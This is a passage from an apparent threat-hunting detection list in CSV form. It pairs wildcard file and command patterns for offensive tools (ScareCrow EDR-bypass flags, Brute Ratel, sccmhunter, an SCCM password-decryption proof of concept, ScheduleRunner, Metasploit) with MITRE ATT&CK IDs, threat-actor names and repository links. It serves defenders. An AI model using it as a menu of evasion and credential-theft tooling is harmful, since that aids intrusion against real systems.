T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -Evasion*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -Exec*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -injection*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -Loader * ,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -noamsi*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -noetw*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -obfu*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*_darwin_amd64*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*_windows_amd64.exe*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*KnownDLL*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*ProcessInjection*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*windows_amd64.exe*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,1,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -*ScareCrow.go*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Cryptor*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/limelighter*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Loader*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Utils*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_*_darwin_amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_*_linux_amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_*amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_checksums.txt*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*SCCM_DLLSiteloading.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*sccmdecryptpoc.*,offensive_tool_keyword,sccmdecryptpoc,SCCM Account Password Decryption POC,T1555.003,TA0006,N/A,N/A,Credential Access,https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sccmhunter.db,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmhunter.git*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmhunter.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmwtf.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*scdivert localhost *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*scheduledtask_utils.py *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*ScheduleRunner.csproj*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*ScheduleRunner.exe*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*ScheduleRunner.sln*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*schlamperei.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 